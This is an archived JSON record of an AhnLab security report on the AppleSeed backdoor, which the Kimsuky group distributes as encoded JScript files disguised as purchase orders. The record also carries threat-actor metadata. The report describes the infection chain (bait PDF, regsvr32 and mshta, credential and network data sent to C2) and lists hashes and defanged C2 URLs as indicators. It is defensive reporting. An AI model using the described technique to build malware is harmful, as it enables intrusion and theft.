{ "id": "989e4aa3-9b22-43f4-9add-5e9feee836fe", "created_at": "2026-04-06T01:31:56.842383Z", "updated_at": "2026-04-10T03:37:40.79386Z", "deleted_at": null, "sha1_hash": "9029565e76ac67fc9125c9d84096a566e4bd48ae", "title": "AppleSeed Disguised as Purchase Order and Request Form Being Distributed", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1022948, "plain_text": "AppleSeed Disguised as Purchase Order and Request Form Being\r\nDistributed\r\nBy ATCP\r\nPublished: 2022-06-29 · Archived: 2026-04-06 00:49:27 UTC\r\nThe ASEC analysis team has recently discovered the distribution of AppleSeed disguised as purchase orders and\r\nrequest forms. AppleSeed is a backdoor malware mainly used by the Kimsuky group. It stays in the system and\r\nperforms malicious behaviors by receiving commands from attackers.\r\nThe malware is currently being distributed under the following filenames.\r\nPurchase order-**-2022****-001-National Tax Service additionally implementing security sensors in 5\r\nregional tax offices_***.jse\r\nRequest form(general manager ***).jse\r\nThe JSE (JScript Encoded File) file consists of JavaScript, and when it is run, it drops AppleSeed backdoor file\r\n(DLL file) and the purchase order PDF file that acts as bait in the %ProgramData% path. After then, PDF file is\r\nautomatically run (see Figure 2).\r\nhttps://asec.ahnlab.com/en/36368/\r\nPage 1 of 5\n\nThe file uses regsvr32.exe to decode and run the backdoor file (area shaded with purple) and mshta.exe to\r\ndownload and run additional scripts (area shaded with red).\r\nhttps://asec.ahnlab.com/en/36368/\r\nPage 2 of 5\n\nWhen the scripts are run, the following information is stolen and sent to the C2.\r\nBasic information of the PC (PC name, OS version, processor, and memory)\r\nUser account credentials\r\nNetwork information (IP address, routing table, port usage information, and ARP list)\r\nList of running processes and services\r\nFolders and files within ProgramFiles / Programs within the Start menu / List of recent files\r\nThe AppleSeed backdoor file continuously receives commands from the C2 server to download and run additional\r\nmodules, or perform behaviors that the attacker wishes to perform. For a detailed analysis of AppleSeed, refer to\r\nthe following link.\r\nThe figure below shows the overall process tree after the scripts are run.\r\nhttps://asec.ahnlab.com/en/36368/\r\nPage 3 of 5\n\nBecause the bait file is also run, users normally cannot recognize that their systems are infected by malware. As\r\nthe files mentioned above mainly target certain companies, users should refrain from running attachments in\r\nemails sent from unknown sources.\r\nAhnLab’s anti-malware software, V3, is currently detecting and blocking the files using the following aliases.\r\n[File Detection]\r\nDropper/JS.Generic\r\nBackdoor/Win.AppleSeed.R499775\r\nMD5\r\n1ae2e46aac55e7f92c72b56b387bc945\r\nhttps://asec.ahnlab.com/en/36368/\r\nPage 4 of 5\n\n67e7e8600a57e9430a43bf8c5f98c6bd\r\n7d445b39a090b486aaa002b282b4d8cb\r\nec9dcef04c5c89d6107d23b0668cc1c1\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//dirwear[.]000webhostapp[.]com/\r\nhttp[:]//gerter[.]getenjoyment[.]net/\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nSource: https://asec.ahnlab.com/en/36368/\r\nhttps://asec.ahnlab.com/en/36368/\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://asec.ahnlab.com/en/36368/" ], "report_names": [ "36368" ], "threat_actors": [ { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775439116, "ts_updated_at": 1775792260, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9029565e76ac67fc9125c9d84096a566e4bd48ae.pdf", "text": "https://archive.orkl.eu/9029565e76ac67fc9125c9d84096a566e4bd48ae.txt", "img": "https://archive.orkl.eu/9029565e76ac67fc9125c9d84096a566e4bd48ae.jpg" } }